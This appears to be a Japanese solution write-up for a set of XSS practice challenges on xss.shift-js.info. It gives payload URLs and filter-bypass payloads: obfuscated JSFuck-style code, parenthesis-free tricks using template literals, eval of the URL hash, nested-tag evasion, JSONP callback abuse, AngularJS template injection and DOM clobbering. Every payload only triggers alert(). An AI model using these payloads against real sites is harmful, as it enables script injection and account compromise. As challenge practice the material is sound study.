https://xss.shift-js.info/case01.php?payload=%3Cimg+onerror%3Dalert%28%27XSS%27%29+src%3D%2F%3E
Simple
<img onerror=alert('XSS') src=/>
https://xss.shift-js.info/case02.php#%3Cimg%20onerror=alert(document.domain)%20src=/%3E
ハッシュに入れる
<img onerror=alert(document.domain) src=/>
https://xss.shift-js.info/case03.php?payload=javascript%3Aalert%28%22XSS%22%29
aタグに甘える
javascript:alert("XSS")
https://xss.shift-js.info/case04-1.php?payload=%24%7Balert%28%27XSS%27%29%7D
https://xss.shift-js.info/case04-2.php?payload=%24%7Balert%28%27XSS%27%29%7D
template literal内で実行 ${alert('XSS')}
https://xss.shift-js.info/case05.php?payload=%24%3D~%5B%5D%3B%24%3D%7B___%3A%2B%2B%24%2C%24%24%24%24%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C__%24%3A%2B%2B%24%2C%24_%24_%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C_%24_%3A%2B%2B%24%2C%24_%24%24%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24_%24%3A%28%24%5B%24%5D%2B%22%22%29%5B%24%5D%2C_%24%24%3A%2B%2B%24%2C%24%24%24_%3A%28%21%22%22%2B%22%22%29%5B%24%5D%2C%24__%3A%2B%2B%24%2C%24_%24%3A%2B%2B%24%2C%24%24__%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24_%3A%2B%2B%24%2C%24%24%24%3A%2B%2B%24%2C%24___%3A%2B%2B%24%2C%24__%24%3A%2B%2B%24%7D%3B%24.%24_%3D%28%24.%24_%3D%24%2B%22%22%29%5B%24.%24_%24%5D%2B%28%24._%24%3D%24.%24_%5B%24.__%24%5D%29%2B%28%24.%24%24%3D%28%24.%24%2B%22%22%29%5B%24.__%24%5D%29%2B%28%28%21%24%29%2B%22%22%29%5B%24._%24%24%5D%2B%28%24.__%3D%24.%24_%5B%24.%24%24_%5D%29%2B%28%24.%24%3D%28%21%22%22%2B%22%22%29%5B%24.__%24%5D%29%2B%28%24._%3D%28%21%22%22%2B%22%22%29%5B%24._%24_%5D%29%2B%24.%24_%5B%24.%24_%24%5D%2B%24.__%2B%24._%24%2B%24.%24%3B%24.%24%24%3D%24.%24%2B%28%21%22%22%2B%22%22%29%5B%24._%24%24%5D%2B%24.__%2B%24._%2B%24.%24%2B%24.%24%24%3B%24.%24%3D%28%24.___%29%5B%24.%24_%5D%5B%24.%24_%5D%3B%24.%24%28%24.%24%28%24.%24%24%2B%22%5C%22%22%2B%24.%24_%24_%2B%28%21%5B%5D%2B%22%22%29%5B%24._%24_%5D%2B%24.%24%24%24_%2B%22%5C%5C%22%2B%24.__%24%2B%24.%24%24_%2B%24._%24_%2B%24.__%2B%22%28%5C%5C%5C%22%5C%5C%22%2B%24.__%24%2B%24._%24%24%2B%24.___%2B%22%5C%5C%22%2B%24.__%24%2B%24._%24_%2B%24._%24%24%2B%22%5C%5C%22%2B%24.__%24%2B%24._%24_%2B%24._%24%24%2B%22%5C%5C%5C%22%5C%5C%22%2B%24.%24__%2B%24.___%2B%22%29%22%2B%22%5C%22%22%29%28%29%29%28%29%3B
alert('XSS')
⤵
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$._$$+"\\\"\\"+$.$__+$.___+")"+"\"")())();
https://xss.shift-js.info/case06.php?payload=%3Cscript%3E+document%5B%60locati%24%7B%22o%22%7Dn%60%5D%3D%60javascript%3Aalert%24%7B%5Batob%2B%22%22%5D%5B0%5D%5B13%5D%7D%27XSS%27%24%7B%5Batob%2B%22%22%5D%5B0%5D%5B14%5D%7D%60+%3C%2Fscript%3E
$escaped = preg_replace("/[()]/", "", $_GET['payload']);
$escaped = preg_replace("/[oO][nN]/", "", $escaped);
カッコが使えないのでdocument.location=javascript:~
で実行してしまう。
それとon/ON/On/oN
がダメなので適当に回避。
<script>
document[`locati${"o"}n`]=`javascript:alert${[atob+""][0][13]}'XSS'${[atob+""][0][14]}`
</script>
<script>
t=[b+""][0][7];window[`docume${t}t`][`locatio${t}`]=`javascript:alert${[atob+""][0][13]}'XSS'${[atob+""][0][14]}`
</script>
o/O
=> n/N
が使えないのでn
を適当な変数に入れる。
https://xss.shift-js.info/case07-1.php?payload=<script>eval%28location.hash.substring%281%29%29<%2Fscript>#javascript:alert('XSS')
https://xss.shift-js.info/case07-2.php?payload=<script>eval%28location.hash.substring%281%29%29<%2Fscript>#javascript:alert('XSS')
<script>eval(location.hash.substring(1))</script>
#alert('XSS')
各種quateが使えないのでhashに載せてevalで実行したけど 、こんな感じでも解けますね…
<script>eval(String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41))</script>
こんな感じで雑に作りました
"<script>eval(String.fromCharCode("+ `alert("XSS")`.split("").map(s=>s.charCodeAt(0)).join() +"))</script>"
https://xss.shift-js.info/case08.php?payload=%22+onmouseover%3D%27document.location%3D%22javascript%3Aalert%22%2B%5Batob%2B%22%22%5D%5B0%5D%5B13%5D%2B%5Balert%2B%22%22%5D%5B0%5D%5B19%5D+%2B+%22XSS%22+%2B+%5Balert%2B%22%22%5D%5B0%5D%5B19%5D+%2B%5Batob%2B%22%22%5D%5B0%5D%5B14%5D%27
カッコ()
を適当なところ(atob)から取ってきました。
あとタグが切れないのでOnMouseOverで誤魔化しました…
" onmouseover='document.location="javascript:alert"+[atob+""][0][13]+[alert+""][0][19] + "XSS" + [alert+""][0][19] +[atob+""][0][14]'
https://xss.shift-js.info/case09.php?payload=%3Cscrscriptipt%3Ealert%28%27XSS%27%29%3C%2Fscrscriptipt%3E
$escaped = preg_replace("/\s/", "", $_GET['payload']);
$escaped = preg_replace("/script/", "", $escaped);
<scrscriptipt>alert('XSS')</scrscriptipt>
とか
<s cript>alert('XSS')</s cript>
とかで出来ました
エスケープが雑だったので一番カンタンだったかもしれない…
slashで空白を作る
<img/src="1"/onerror=alert("XSS")>
https://xss.shift-js.info/case20.php?payload=%3Cscript+src%3D%27https%3A%2F%2Fxss.shift-js.info%2Fjsonp.php%3Fcallback%3Dalert%28%2522XSS%2522%29%27%3E%3C%2Fscript%3E
jsonpのcallbackをいじります。
<script src='https://xss.shift-js.info/jsonp.php?callback=alert(%22XSS%22)'></script>
https://xss.shift-js.info/case21.php?payload=%22+id%3D1+%3Cinput+id%3D%22equation%22+value%3Dalert%28%22XSS%22%29%3E%3C/body%3E%3C!--
equationのvalueを上書き
" id=1 <input id="equation" value=alert("XSS")></body><!--
https://xss.shift-js.info/case22.php?payload=%7B%7Bconstructor.constructor%28%27alert%28%22XSS%22%29%27%29%28%29%7D%7D
こちら を参考にしました
{{constructor.constructor('alert("XSS")')()}}
https://xss.shift-js.info/case23.php?payload=alert%28%27XSS%27%29%2F%2F%3Cscript+id%3D%22injectarea%22%3E%3C%2Fscript%3E%3Cdiv+id%3D
こちらを参考にしました。
alert('XSS')//<script id="injectarea"></script><div id=